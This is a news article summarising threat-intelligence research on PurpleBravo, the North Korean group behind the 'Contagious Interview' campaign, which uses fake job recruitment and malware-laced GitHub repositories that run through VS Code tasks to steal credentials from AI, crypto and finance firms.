North Korean Hackers Target 3,100 IPs in $2B Fake Job Scam Campaign
North Korean hackers are back in the game after apparently pilfering over 2 billion in crypto dollars last year. A new campaign has popped..
Quick overview
- North Korean hackers, known as PurpleBravo, have launched a new campaign called 'Contagious Interview' targeting over 3,100 IP addresses in the AI, crypto, and financial sectors.
- They employ fake job recruitment tactics to infiltrate companies, using malware disguised in developer tools to gain remote access.
- PurpleBravo utilizes various malware families and online deception techniques, including fake personas and job websites, to steal corporate credentials.
- Their advanced tactics include exploiting Visual Studio Code to execute malicious code, highlighting the need for companies to enhance their security measures.
North Korean hackers are back in the game after apparently pilfering over 2 billion in crypto dollars last year. A new campaign has popped up, called “Contagious Interview”, which targets a whopping 3,100 IP addresses that belong to companies in AI, crypto, and financial services, as per Recorded Futures Insikt group.
These guys, known as PurpleBravo, play a very sneaky trick. They come in as fake job recruiters but, in reality, use developer tools rigged with malware to get into companies’ systems. So far, they’ve identified 20 victim organizations across South Asia, NA, Europe, the Middle East, and Central America.
- Targets are all the big tech and crypto firms worldwide.
- The malware enables hackers to execute code remotely.
- They use fake recruitment to gain access to the company’s networks.
The Malware Tools and Online Deception
PurpleBravo has a whole arsenal of malware families at its disposal, including Windows-only PylangGhost and cross-platform GolangGhost. They take browser credentials and cookies. They hide behind Astrill VPNs and C2 servers in China, and they’ve got 17 hosting providers wrapped up in all this.
https://www.recordedfuture.com/research/purplebravos-targeting-it-software-supply-chain
These hackers are also super good at online deception – they make up fake online personas claiming to be from Odessa, Ukraine, and this time they seem to be focused on South Asian job seekers. They even created fake job websites, used a token-themed website that looked like it was from a food brand, and sold fake LinkedIn and Upwork accounts via Telegram channels.
- The Telegram accounts use proxy services to hide their location.
- They weaponised GitHub repositories, hiding malware within them.
- Remote access trojans make it easy to steal all the corporate credentials.
VS Code Exploits and Corporate Risks
Well, it looks like PurpleBravo even managed to rig up a version of Microsoft’s Visual Studio Code. If a target opens one of their fake Git repos and grants the author trust, the code inside is executed automatically, giving the hackers full remote access.
This new tactic – first spotted in December – shows just how advanced these North Korean hackers are becoming in their corporate infiltration techniques. Theyre using developer tools more and more, and it’s all pointing to how important it is for companies to be on their toes with their coding and recruitment practices.
- The malware executes through VS Code’s tasks.json file.
- The infection starts by cloning some malicious GitHub repos
- Remote code execution exposes the whole network.
- Check out our free forex signals
- Follow the top economic events on FX Leaders economic calendar
- Trade better, discover more Forex Trading Strategies
- Open a FREE Trading Account
Save